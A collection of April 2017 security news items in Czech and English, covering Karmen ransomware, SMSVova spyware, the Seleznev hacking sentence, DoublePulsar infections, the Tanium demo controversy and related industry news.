Na začátku roku jsme se na jeden takový ransomware podívali pod drobnohledem. Jednalo se o jednu z mnoha variant viru Petya, který zašifroval celý systémový oddíl počítače, takže po restartu se již nenahrály Windows, ale maličký program uložený na začátku pevného disku, který jen oznámil, že jste obětí útoku, a pokud nezaplatíte výkupné okolo 1,3 BTC (aktuálně 42 tis. Kč), naprosto o vše přijdete.
Dobrý den, zašifrovali jsme Vám počítač. Pošlete nám bitcoin a užijte si zbytek dne
Zimní ransomware Petya/GoldenEye se vydával za falešný životopis jistého Rolfa Dreschera, který se šířil jako XLS příloha e-mailu, cílil tedy na nepozorné personalisty, kteří v naději nového špičkového zaměstnance mohli zapomenout na základní bezpečnostní poučky.
Jmenuji se Karmen, zašifruji vám soubory a vy mi zaplatíte
Uběhlo pár měsíců a tentokrát se se zajímavým úlovkem pochlubili zase specialisté z Recorded Future. Zmapovali totiž novou modifikaci ransomwaru, který si říká Karmen a nejspíše se inspiroval ve studijním open-source „ransomawaru“ Hidden Tear, jehož kód najdete na GitHubu.
Na undergroundových tržištích se objevil nový ransomware Karmen
Karmen není zdánlivě tak nebezpečný jako Petya, šifruje totiž pouze uživatelské soubory, ke kterým má práva. V podstatě jej tedy musíte sami spustit a ke všemu k běhu vyžaduje nainstalovaný .NET Framework.
Jenže to vlastně stačí. Ransomware nepotřebuje šifrovat systémové soubory. Proč by to dělal? Vždyť ty nemají žádnou cenu. Jeho cílem je vaše unikátní složka v C:\Users, na které se po spuštění okamžitě vyřádí a dle rychlosti disku a velikosti dat zničí soubor po souboru dostatečně silnou šifrou AES-256.
Video: Takhle útočí ransomware
Oběť to záhy pozná, soubory totiž budou mít novou příponu GRT a také ikonu. Co se stane, ilustruje video níže, které vytvořili přímo autoři viru. Nejprve tedy uvidíte několik oken Průzkumníku a v něm běžné soubory, které autor videa otevře, aby bylo zřejmé, že jsou zcela v pořádku.
Poté autor videa spustí samotný virus a ten okamžitě začne soubory šifrovat. Na obrazovce se zároveň zobrazí zpráva o útoku a varování, aby se oběť o nic nepokoušela, protože by mohla o data nenávratně přijít. Obsah souborů při další zkoušce už samozřejmě neodpovídá těm původním.
Samotný ransomware se zároveň snaží detekovat, jestli neběží v sandboxu (třeba na virtuálním počítači antivirové firmy). V takovém případě okamžitě smaže program pro dešifrování, aby analytik nemohl snadno zjistit, jak v nitru funguje.
Karmen by ovládla i vaše babička
Na Karmen je ale nejzajímavější něco úplně jiného. Nikoliv virus samotný, ale ekosystém okolo. Správa ransomwarové kampaně je totiž zjevně naprosto jednoduchá. Zdaleka nejtěžším kouskem je tedy v tomto případě dostat se vůbec do některého s ruských undergroundových fór a Karmen si koupit.
Správa ransomwarové kampaně Karmen. V dashboardu vidím počet nakažených klientů, počet těch, kteří už zaplatili a celkovou částku. (Zdroj: Recorded Future)
Pokud se to útočníkovi podaří a samotný virus dopraví k oběti (třeba opět skrze poštovní přílohu), stačí spustit webové rozhraní Karmen, které funguje jako jakési CRM. Toto ale nevyvinul SAP a jemu podobní, ale zjevně pár znuděných ruských studentů, kteří si chtějí vydělat na vodku a chléb.
Klient tedy bude moci v prohlížeči sledovat, jak mu naskakují noví a noví zákazníci a jestli už zaplatili správní poplatek v bitcoinech, který jim může dynamicky nastavovat. Po úspěšné platbě se pak automaticky aktivuje příkaz k dešifrování. Tedy pokud mezi tím ransomwarová kampaň neskončila. Platba útočníkovi je tedy vždy ošemetná. Virus se sice může dál samovolně šířit, ale spojení na vzdálený server, kde to vše někdo ovládá, už dávno nemusí existovat. A hlavně, uskutečněná platba pouze a jen motivuje další případné ransomwarové útočníky.
Seznam jednotlivých nakažených klientů a jejich aktuální stav (Zdroj: Recorded Future)
A co tedy dělat, aby se Karmen neobjevila i u vás na počítači? Polovinou úspěchu je racionální chování na internetu a tou druhou pak řádně zabezpečený počítač. A jak radí specialisté z Recorded Future, pokud narazíte na soubory níže, raději je hned smažte (a ne, opravdu je neposílejte svým nadřízeným).
joise.exe (MD5 checksum: 9c8fc334a1dc660609f30c077431b547)
n_karmen.exe (MD5 checksum: 56b66af869248749b2f445be8f9f4a9d)
build.exe (MD5 checksum: 521983cb92cc0b424e58aff11ae9380b)
Fake app hiding a SMSVova spyware went undetected for years in the Google Play Stores
23.4.2017 securityaffairs Android
Millions of users looking to get software updates have downloaded an app hiding a spyware called SMSVova through the official Google Play store.
Bad news for millions of Android users looking to get software updates, they have been tricked into downloading a spyware called SMSVova through the official Google Play store.
Experts at Zscaler discovered that the bogus app was posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software release.
It has been estimated that the fake application hiding the SMSVova spyware was uploaded in the Google Play in 2014, and has been downloaded between 1,000,000 and 5,000,000 times.
Experts reported the discovery to Google that promptly removed it from the store.
The SMSVova spyware was developed to track the physical location of the users, it was controlled by attackers via SMS messages.
“In our ongoing effort to hunt malware, the Zscaler ThreatLabz team came across a highly suspicious app on the U.S. Google Play Store that has been downloaded between one and five million times since 2014.” reads the analysis published Zscaler. “Upon analysis, we found it to be an SMS-based Spyware, which can steal and relay a victim’s location to an attacker in real time.”
According to Zscaler, once the app was installed when users try to open it they were displayed the message:
‘Unfortunately, Update Service has stopped.’
then the app hides itself from the main screen and launches the phone’s MyLocationService which collect location data and stores it in the Shared Preferences directory of the mobile device.
Despite the error message, the spyware sets up an Android service and broadcast receiver:
MyLocationService: Fetches last known location
IncomingSMS (Receiver): Scans for incoming SMS message
SMSVova monitors specific incoming SMS messages with specific characteristics, messages with more than 23 characters in length and that contain the text string “vova-” and “get faq.”
“Once the spyware has been installed on the victim’s device, an attacker can send an SMS message ‘get faq’ and this spyware will respond with a set of commands,” according to Zscaler.
The SMSVova spyware implements other commands, including “changing current password” and “setting low battery notification.” According to Desai, those behind the spyware use the SMS commands in order to instruct SMSVova to retrieve and text back location data. The “setting low battery notification” message is used to instruct the phone to text location data when the battery runs low.
It’s still a mystery why threat actor behind the spyware is collecting location data.
It is interesting to note that the SMS-based behavior and exception generation at the initial stage of the startup weren’t detected by the antivirus engines on VirusTotal.
Authors of the SMSVova spyware have designed the threat to evade detection by antivirus solutions and Google Play’s malware detector. The app was last updated in December 2014, at that time the controls implemented by Google weren’t so stringent, anyway the malicious code eluded Google detector for years.
It is curious to note that according to the recent Google Android Security 2016 Year In Review report, in 2016 devices that installed applications only from Google Play had fewer than 0.05 percent of potentially harmful applications installed.
“There are many apps on the Google Play store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app we analyzed for this report,” concluded the analysis.
US Court sentenced Russian hacker Roman Seleznev to 27 years in jail for hacking
23.4.2017 securityaffairs Crime
Roman Seleznev, the son of the prominent Russian Parliament member Valery Seleznev was sentenced to 27 years in jail for hacking.
The Russian hacker Roman Seleznev, aka Track2, was sentenced to 27 years in prison, he was convicted of causing $170 million in damage by hacking into point-of-sale systems.
This sentence is the longest one ever imposed in the United States for a hacking-related case.
On the defense side, the Seleznev’s defense attorney Igor Litvak explained that a 27-years sentence in prison is an absolutely inappropriate sentence for cyber theft.
Roman Seleznev is the son of one of the most prominent Russian lawmaker and Russian Parliament member Valery Seleznev.
According to prosecutors, Seleznev targeted computers belonging to both small businesses and large financial institutions. Authorities arrested the Russian expert in the Maldives in 2014, they seized his laptop containing more than 1.7 million credit card numbers.
The Russian Foreign Ministry judged the extradition to the US as a “kidnapping” and against all norms of international law.
The stolen credit card data were offered for sale on multiple “carding” websites.
After an August 2016 trial, Seleznev was convicted on 38 counts:
10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft
“A 32-year-old Vladivostok, Russia, man was sentenced today to 27 years in prison for his computer hacking crimes that caused more than $169 million in damage to small businesses and financial institutions, announced Acting Assistant Attorney General Kenneth A. Blanco of the Justice Department’s Criminal Division and U.S. Attorney Annette L. Hayes of the Western District of Washington. “
“Roman Valeryevich Seleznev, aka Track2, was convicted in August 2016, of 38 counts related to his scheme to hack into point-of-sale computers to steal credit card numbers and sell them on dark market websites. U.S. District Judge Richard A. Jones of the Western District of Washington imposed the sentence.” reads the press release published by the DoJ.
In federal court in Seattle, prosecutors asked for a 30-year prison term because Roman Seleznev “became one of the most revered point-of-sale [POS] hackers in the criminal underworld.”
Roman Seleznev was the mastermind behind a profitable hacking scheme that implemented automated techniques to hack into POS systems and deliver malware to steal credit card data.
According to the prosecutors said his hacking campaign hit more than 3,700 businesses.
“Many of the businesses targeted by Seleznev were small businesses, and included restaurants and pizza parlors in Western Washington, including Broadway Grill in Seattle, which was forced into bankruptcy following the cyber assault. Testimony at trial revealed that Seleznev’s scheme caused approximately 3,700 financial institutions more than $169 million in losses.” continues the press release.
Roman Seleznev asked US District Court Judge Richard Jones for clemency due to his medical issues, the man explained he was injured in 2011 terrorist bombing in Morocco.
Jones rejected the Seleznev’s argumentation and told the man that the Morocco bombing “was an invitation to right your wrongs and recognize you were given a second chance in life,” but instead, he “amassed a fortune” at the expense of thousands of small business.
“Today is a bad day for hackers around the world,” said U.S. Attorney Annette L. Hayes. “As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind.”
“Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands,” Hayes added.
According to the Russian MP Valery Seleznev, the sentence was “passed by man-eaters” and that his son was “abducted.”
“My son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent,” he told RIA Novosti news agency.”
US Court Sentences Russian Lawmaker's Son to 27 Years in Jail for Hacking
22.4.2017 thehackernews Crime
The son of a prominent Russian lawmaker was sentenced on Friday by a US federal court to 27 years in prison after being convicted of stealing millions of US credit card numbers and causing some $170 million in damages to businesses and individuals.
This sentence is so far the longest sentence ever imposed in the United States for a hacking-related case.
Roman Valeryevich Seleznev, 32, the son of a Russian Parliament member of the nationalist Liberal Democratic Party (LDPR), Valery Seleznev, was arrested in 2014 while attempting to board a flight in the Maldives and then extradited to the United States.
Upon arrest, federal authorities retrieved a computer that contained over 1.7 million stolen credit card numbers.
Seleznev, also went by the moniker 'Track2' online, was convicted in August 2016 of 38 charges related to stolen credit card details, which include:
10 counts of Wire Fraud
9 counts of possession of 15 or more unauthorized access devices
9 counts of obtaining information from a Protected Computer
8 counts of Intentional Damage to a Protected Computer
2 counts of Aggravated Identity Theft
Longest Ever Hacking-Related Sentence in the United States
In federal court in Seattle, the government asked for a 30-year prison term for 38 counts, saying Seleznev not only helped grow the market for stolen credit card data but also "became one of the most revered point-of-sale [POS] hackers in the criminal underworld."
Seleznev – and potentially other cyber criminals who are unknown to the authorities – developed a hacking scheme that used automated techniques to hack into POS machines in retailers and install malware to steal copies of credit card numbers.
The lists of millions of stolen credit card numbers were then sold on various online "carding" websites and the dark web. Prosecutors said his hacking campaign hit more than 3,700 businesses.
Before his sentencing, Seleznev asked US District Court Judge Richard Jones for leniency, urging the judge to consider his medical issues, the result of being caught and injured in 2011 terrorist bombing, in deciding his prison term.
However, Jones told Seleznev that the Morocco bombing "was an invitation to right your wrongs and recognize you were given a second chance in life," but instead, you "amassed a fortune" at the expense of thousands of small business.
"Today is a bad day for hackers around the world," said U.S. Attorney Annette L. Hayes. "As Mr. Seleznev has now learned, and others should take note – we are working closely with our law enforcement partners around the world to find, apprehend, and bring to justice those who use the internet to steal and destroy our peace of mind."
"Whether the victims are multi-national banks or small pizza joints, we are all victims when our day-to-day transactions result in millions of dollars ending up in the wrong hands," Hayes added.
Russian MP: Sentence "Passed by Man-Eaters;" My Son is innocent!
Twenty-seven years in prison is an absolutely inappropriate sentence for cyber theft, Seleznev's defense attorney Igor Litvak stated on Friday.
Seleznev's arrest in the Maldives and then extradition to the United States sparked an international dispute between American and Russian authorities. The Russian Foreign Ministry even characterized the extradition as a "kidnapping" and against all norms of international law.
Russian MP Valery Seleznev, the father of Seleznev, said the sentence was "passed by man-eaters" and that his son was "abducted."
The Roman MP added that his "son was tortured because being in jail in a foreign country after abduction is torture in itself. He is innocent."
Mr. Seleznev also said that he viewed the 27-years-prison sentence as a life sentence because his son would never survive these much years in prison.
Chinese APTs targeted the South Korean THAAD anti-missile systems
22.4.2017 securityaffairs APT
According to researchers at FireEye, Chinese hackers targeted the South Korean Terminal High Altitude Area Defense (THAAD) missile system.
According to a new investigation conducted by security firm FireEye, Chinese hackers are trying to hack systems used by South Korea military to interfere with the deployment of an anti-ballistic weapons system.
The news was confirmed by the FireEye’s director of cyber-espionage analysis John Hultquist in an interview with the Wall Street Journal.
FireEye has observed cyber attacks aimed to hack the Terminal High Altitude Area Defense (THAAD) missile system. The THAAD system was designed by South Korea to protect the country from the incoming intercontinental ballistic missile (ICBMs), it is part of the Star Wars defense system.
South Korea is deploying Lockheed Martin’s THAAD missile defense system (Image source Ars Technica)
China has long been in opposition to the deployment of the THAAD since South Korea announced it as a key component of its defense infrastructure.
“China opposes Thaad, saying its radar system can reach deep into its own territory and compromise its security. South Korea and the U.S. say Thaad is purely defensive. The first components of the system arrived in South Korea last month and have been a key issue in the current presidential campaign there.” reported the WSJ.
According to FireEye, at least two different Chinese hacking crews were involved in cyber attacks against the South Korean military systems that in some way were linked to the design and deployment of the THAAD.
The two teams involved in the attack are the Tonto team and the notorious APT10.
“One of the two hacker groups, which FireEye dubbed Tonto Team, is tied to China’s military and based out of the northeastern Chinese city of Shenyang, where North Korean hackers are also known to be active, said Mr. Hultquist, a former senior U.S. intelligence analyst.” continues the WSJ. “FireEye believes the other, known as APT10, may be linked to other Chinese military or intelligence units.”
Hackers launched spear phishing attacks using messages with weaponized attachments. According to FireEye, at least one person felt victim of the attacks, anyway, FireEye was able to profile the threat actors and track the APTs’ movements.
“Mr. Hultquist added that an error in one of the group’s operational security provided FireEye’s analysts with new information about the group’s origins.”
China’s Ministry of Defense recently declared that People’s Liberation Army “has never supported any hacking activity.”
Hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
22.4.2017 securityaffairs BigBrothers
Security researcher warn of hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
Security expert Dan Tentler, the founder of security shop Phobos Group, has observed a significant increase in the number of Windows boxes exposed on the Internet that has been hacked with DOUBLEPULSAR backdoor. The compromised windows boxes have been used for several criminal purposes such as delivering malware or used in spam campaigns.
The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system, it is installed by leveraging the ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).
Every Window machine running an old vulnerable version that exposes an SMB service is at risk of hack.
The DOUBLEPULSAR and ETERNALBLUE are now available for anyone after the archive of NSA tools was leaked online.
Recently Microsoft patched the SMB Server vulnerability (MS17-010) exploited by ETERNALBLUE, the security updates were released for Windows Vista SP2, Windows 7, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012 and Windows Server 2012 R2, Windows Server 2016, and Server Core.
According to Tentler, who scanned the Internet for vulnerable Windows boxes, 15,196 systems have been already compromised, most of them in the US.
The expert also observed that the number of infections continues to increase.
Windows boxes compromised with the DOUBLEPULSAR implant could be easily identified observing the response to a special ping to port 445.
“I’m hopeful this is the wakeup moment for people over patching Windows machines.” said Tentler.
According to Tentler on Easter weekend, script kiddies worldwide launched a massive attack leveraging the DOUBLEPULSAR exploit.
The experts have no doubt, the number of DOUBLEPULSAR attacks could continue to increase in the coming week.
Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs
22.4.2017 thehackernews BigBrothers
Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.
Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, allegedly belonged to the NSA's Equation Group.
What's Worse? Microsoft quickly downplayed the security risks by releasing patches for all exploited vulnerabilities, but there are still risks in the wild with unsupported systems as well as with those who haven't yet installed the patches.
Multiple security researchers have performed mass Internet scans over the past few days and found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant, as a result of a free tool released on GitHub for anyone to use.
Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.
A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.
The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.
Therefore, to compromise a machine, it must be running a vulnerable version of Windows OS with an SMB service expose to the attacker.
Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.
Once installed, DoublePulsar used hijacked computers to sling malware, spam online users, and launch further cyber attacks on other victims. To remain stealthy, the backdoor doesn't write any files to the PCs it infects, preventing it from persisting after an infected PC is rebooted.
While Microsoft has already patched majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.
Moreover, systems that are still using end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer received security updates, are also vulnerable to the in-the-wild exploits.
Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver hacking exploits, researchers are expecting more vulnerable and unpatched computers to fall victims to DoublePulsar.
After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."
Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.
Americký soud poslal ruského hackera na 27 let do vězení
22.4.2017 Novinky/Bezpečnost Kriminalita
Soud v americkém Seattlu v pátek poslal na 27 let do vězení ruského hackera Romana Selezňova, který internetovými krádežemi kreditních karet a dalšími online podvody způsobil škody ve výši 169 milionů dolarů (4,2 miliardy korun). Podle amerických právníků jde o zatím nejvyšší trest, který byl v USA za podobné zločiny vyměřen.
Rusko v sobotu označilo soud s hackerem za nezákonný, protože Selezňova podle Moskvy unesly do USA americké tajné služby.
Celá kauza je pro Rusko mimořádně citlivá, protože Roman Selezňov je synem poslance ruské Státní dumy za ruské nacionalisty Valerije Selezňova. Dvaatřicetiletý Roman se internetovými podvody zabýval od roku 2009, podle amerických prokurátorů získal citlivé údaje o 1,7 miliónu kreditních karet.
Údaje kradl z počítačových systémů pizzerií a restaurantů většinou ve státě Washington na severozápadě USA a následně je prodával.
Rusko trvá na tom, že zadržení Selezňova na Maledivách v roce 2014 bylo nezákonné.
Ruské velvyslanectví ve Washingtonu
Selezňov se ke svým činům přiznal a požádal soud o shovívavost vzhledem ke své invaliditě. V roce 2011 byl zraněn při teroristickém útoku v marocké Marrákeši, který si vyžádal smrt 17 lidí, většinou zahraničních turistů.
Americká justice Selezňova obvinila už v roce 2011, ale v Rusku ho zadržet nemohla. Když v roce 2014 Selezňov odjel na dovolenou na Maledivy, požádal Washington tamní úřady o spolupráci. Hacker byl nakonec vydán do USA.
Jeho extradice Rusku vadí, protože Selezňov je ruským občanem a z Malediv byl podle Moskvy „fakticky unesen”. Ruské velvyslanectví ve Washingtonu vydalo prohlášení, podle něhož „Rusko trvá na tom, že zadržení Selezňova na Maledivách v roce 2014 bylo nezákonné”. Rusko prý očekává, že obhájce odsouzeného se odvolá.
Sám Selezňov vydal prohlášení, v němž přísný verdikt označuje za „signál vlády Spojených států ruskému prezidentu Vladimiru Putinovi”. Podle ruského hackera to „není správná cesta, jak Rusku nebo kterékoli jiné zemi ukázat, jak v demokracii funguje justice”.
Tanium Blasted for Using California Hospital Network for Sales Demos
22.4.2017 securityweek Security
Tanium Accused of Exposing California Hospital’s Network in Sales Demos Without Client Permission
Earlier this week, Orion Hindawi, CEO of systems and security management company Tanium, published an open letter covering two issues of current 'bad press'. The first is that Tanium has a toxic staff relations culture. Hindawi denies this: "Mission-oriented, hard-charging, disciplined, even intense, but not toxic."
The second issue is less easy to dismiss. It stems from an initial report in The Wall Street Journal, subsequently picked up by numerous other media outlets.
"For years, cybersecurity startup Tanium Inc. pitched its software by showing it working in the network of a hospital it said was a client..." wrote the WSJ. The problem here is that the demo was live and uncensored, giving out details of the client's name (the El Camino Hospital in Mountain View, California) and IT infrastructure, apparently without authorization to do so.
'Start-up' is a misleading description: Tanium is neither new (it was founded ten years ago), nor small (it was last valued at $3.5 billion). It has, however, been growing rapidly; and that might be part of the problem. In May 2014 it raised $90 Million in funding from Silicon Valley VC firm Andreessen Horowitz; and added a further $52 million in March 2015.
"When you start to develop a new product," Stuart Okin, SVP of Product at 1E told SecurityWeek, "the very first thing you do is solve the problem of how you are going to demonstrate it." 1E spent three months solving this problem at the start of developing Tachyon, a competing product that bears some similarities to Tanium.
Both products must scale to huge numbers, and need to be able to demonstrate this ability. Okin's solution was to develop an in-house emulator using virtual machines. Tanium doesn't seem to have had such a plan. Exactly what happened isn't clear, beyond that Tanium seems to have had a direct link into the hospital's system and was able to demonstrate the product in action, live.
In doing so, viewers would have been able to discover information about the network's infrastructure and its strengths and weaknesses -- knowledge that would have been invaluable to a potential attacker. In his letter, Hindawi acknowledges mistakes. Without mentioning El Camino, he writes, "We should have done better anonymizing that customer’s data."
But he also makes the point, "Other than the few customers who have signed those documents [allowing Tanium demonstrations] and provided us remote access to their Tanium platforms, we do not -- and in fact cannot -- demonstrate customer environments with Tanium." This implies that someone at El Camino provided the physical connection that allowed the Tanium demonstrations.
But the hospital denies this. In a separate statement, a spokesperson said, "El Camino Hospital was recently made aware that Tanium, a former third-party vendor that provided a desktop management program, had been using hospital desktop and server management information as part of a sales demonstration. El Camino Hospital was not aware of this usage and never authorized Tanium to use hospital material in any sales material or presentation."
Clearly, these two statements do not align. "This is a very embarrassing incident for the cybersecurity industry, as it undermines trust towards the large and reputable players," High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek. "However, anyone can make a mistake, and prior to any conclusions or accusations, a thorough investigation should be duly performed. Many successful companies become victims of their own success -- it’s very challenging to maintain skyrocketing growth and assure that every employee respects all the internal procedures and policies in their integrity. In the cybersecurity industry, this problem is especially important, as startups grow very quickly and handle extremely sensitive data. I hope that all companies, not just Tanium, will learn a lesson and revise their internal policies and their practical enforcement."
Mistakes were certainly made, but the bottom line is that it should never have happened. "Using live customer environments for demos is a rookie move, and certainly not representative of standard practice among security software vendors," commented Okin. "There are established protocols for this -- such as demo rigs in the cloud. The 'wild west' startup approach doesn't fly in the security space, especially as these products and solutions are there to protect information, and you often find yourself engaged in heavily regulated environments."
He added that security companies should never be able to VPN into clients' infrastructures, unless it is an essential part of the service offered. This incident, he said, breaks the essential trust that is necessary between security vendor and client.
WikiLeaks Details Samsung Smart TV Hacking Tool
22.4.2017 securityweek BigBrothers
WikiLeaks has released a document detailing yet another hacking tool allegedly used by the U.S. Central Intelligence Agency (CIA). This time, the organization has published information on a tool designed to record audio via the built-in microphone of some Samsung smart TVs.
The tool, dubbed “Weeping Angel,” is apparently based on “Extending,” an implant allegedly developed by British security service MI5 – the agencies are said to have worked together on this project.
Some information on Weeping Angel was made public by WikiLeaks as part of the first Vault 7 dump, and the organization has now decided to also release a user guide.
The newly released guide, dated February 2014, describes an implant for Samsung F series smart TVs. The implant can record audio from a device via the built-in microphone and either store or exfiltrate the recordings.
The Weeping Angel implant can be installed by connecting a USB device to the targeted TV, and data can be exfiltrated either via a USB stick or a compromised Wi-Fi hotspot. However, previously leaked documents showed that its developers had been planning to add more data theft capabilities, including for browser data and Wi-Fi credentials, and even exploiting available remote access features.
SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.
Last week, WikiLeaks released six documents describing a project named HIVE, which the CIA allegedly used to exfiltrate information from compromised machines and send commands to the malware found on these devices.
The whistleblower organization has also detailed hacking tools targeting security products, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.
While WikiLeaks has offered to share the exploits it possesses with affected tech companies, most firms don’t seem willing to comply with WikiLeaks’ conditions for obtaining the files. Furthermore, an analysis of the available information showed that many of the vulnerabilities have already been patched.
U.S. authorities have neither confirmed nor denied the authenticity of the Vault 7 files, but reports say both the CIA and the FBI are hunting for an insider who may have provided the information to WikiLeaks.
Researchers at Symantec and Kaspersky have found links between the leaked Vault 7 files and the tools used by a cyber espionage group tracked by the security firms as Longhorn and The Lamberts, respectively.
Kaspersky vylepšil svůj firemní antimalware
22.4.2017 SecurityWorld Zabezpečení
Inovovanou verzi svého produktu Endpoint Security for Business uvedl na trh Kaspersky Lab. Přináší přepracované funkce pro ovládání, zvýšenou flexibilitu i ochranu dat či centralizovanou správu vyššího počtu platforem, aplikací a zařízení.
Firmy, využívající produkty Endpoint Security for Business, Security for Exchange Servers nebo Security for SharePoint, mohou nově jednotlivá zařízení monitorovat prostřednictvím platformy Security Center. Jde o jednotnou administrátorskou konzoli, která kromě integrované několikavrstvé ochrany koncových zařízení nabízí možnost vzájemné komunikace a spolupráce zaměstnanců dané společnosti.
Navíc jsou nové funkce a vylepšení Endpoint Security dostupné díky vzdálené instalaci také pro zařízení s operačním systémem Mac, a to pomocí jednodušší instalace, ochraně a správě mobilních zařízení a novým možnostem správy Wi-Fi připojení (k dispozici je seznam důvěryhodných Wi-Fi sítí).
Vylepšený Endpoint Security for Business lze využít také jako senzor platformy Anti-Targeted Acttack -- po nainstalování sbírá a odesílá data platformě, čímž poskytuje lepší informace o firemních systémech.
Další funkcionalita, Changes audit, zase poskytuje IT bezpečnostním odborníkům přehled o provedených změnách ve firemních postupech a úkolech. Jejich porovnáním okamžitě identifikuje případné neshody, díky čemuž se významně zlepšuje kontrola změn bezpečnostního nastavení.
Novinka nabízí i šifrování pevného disku prostřednictvím Microsoft BitLocker nebo Kaspersky Disk Encryption. Security Center je schopný vzdáleně ovládat BitLocker, monitorovat stav zašifrovaných zařízení a zálohovat šifrovací klíče nutné pro případné obnovení zapomenutých přístupových údajů.
Vzhledem k rozdílným požadavkům jednotlivých firem obsahují balíčky Kaspersky Endpoint Security for Business různé funkcionality v balíčcích Select, Advanced a Total.
MasterCard launches Credit Card with Built-In Fingerprint Scanner
21.4.2017 thehackernews Safety
MasterCard has unveiled its brand new payment card that has a built-in biometric fingerprint scanner, allowing customers to authorize payments with their fingerprint, without requiring a PIN code or a signature.
The company is already testing the new biometric payment cards, combined with the on-board chips, in South Africa and says it hopes to roll out the new cards to the rest of the world by the end of 2017.
Don't Worry, It Still Supports PIN-based Transactions as Fallback
Wait — If you think that this feature would not allow you to share your card with your child and spouse, don’t worry — Mastercard has a solution for this issue as well.
The company has confirmed that even if the card is configured to expect the fingerprint for authenticating a purchase, but it does still have a PIN as a fallback, in case, for some reason EMV readers fail to read fingerprint or you have yourself handed it to your child for shopping.
Stores & Retailers Don't Need New Hardware
According to Mastercard, the new biometric payment card will not require store owners and businesses to buy any new hardware, like fingerprint scanners, because the sensor in the card reads your fingerprint.
Since both the data and the scanner exist on the same card, the new payment cards work with existing EMV card terminal infrastructure — the standard chip/swipe readers you can find at many stores these days, though old magnetic stripe-only terminals won't be compatible.
But, Banks Need to Adopt New Technology
Before this new cards can be adopted worldwide, your banks or financial institution will have to get on board with the new tech.
If you want the new biometric card, you are currently required to go to your bank branch in order to have your fingers scanned and registered for the new tech. Your fingerprints will then be converted into an encrypted digital template that is stored on the card's EMV chip.
You can save up to two fingerprints, but both would have to be yours — you can not authorise someone else, even from your family, to use your card with their fingers.
Once your templates are saved, your card is ready to be used at compatible terminals across the world.
Merchants don't have to purchase new equipment to accept your fingerprint-enabled payment card but will have to update their machinery in an effort to use the new tech.
Now, while shopping at any store, just place your biometric payment card into a retailer's EMV terminal and then put your finger on the embedded sensor to pay. Your fingerprints will be verified against a template stored on your card to approve your transaction.
Can Fingerprints be Forged? And Other Concerns...
This new card is made in an attempt to make face-to-face payments more convenient and more secure, but this type of biometric verification is useless when it comes to online shopping, and so, does not provide any security over credit card frauds.
"Whether unlocking a smartphone or shopping online, the fingerprint is helping to deliver additional convenience and security," MasterCard security chief Ajay Bhalla said. "[A fingerprint is] not something that can be taken or replicated and will help our cardholders get on with their lives knowing their payments are protected."
But that isn't true.
Fingerprints can be faked, unfortunately, and we have seen previous research in which high-resolution images were used to make fake fingerprints for malicious purpose. So, criminals could put a fake fingerprint on top of their finger to shop from stolen cards.
In addition to biometric cards, MasterCard is also planning to bring contactless payments, which should function similar to mobile payments like Apple Pay where users authenticate themselves via fingerprint while holding their smartphones against the terminal.
Corporate Users Increasingly Targeted With Exploits: Kaspersky
21.4.2017 securityweek Exploit
A report published by Kaspersky Lab on Thursday shows that the number of attacks involving exploits increased significantly in 2016 compared to the previous year, but the number of attacked users actually dropped.
The security firm observed more than 700 million attempts to execute an exploit in 2016, which represents a 25% increase compared to 2015. However, the number of users attacked was only 4.3 million, compared to nearly 5.5 million in the previous year.
This indicates that while fewer users encountered exploits, the likelihood of coming across an exploit increased as the number of websites and spam messages delivering such threats has continued to grow.
Of all the exploit attacks observed by Kaspersky in 2016, more than 15% were aimed at corporate machines. The number of targeted corporate users increased from 538,000 in 2015 to 690,000 in 2016.
While Windows and web browsers were the most targeted applications in both 2015 and 2016, their share decreased significantly last year, making more room for Android and Microsoft Office exploits.
“Exploits for vulnerabilities in Office software became the absolute champions in terms of the number of attacked users. They increased by almost 103% to reach 367,167 attacked users,” Kaspersky said in its report.
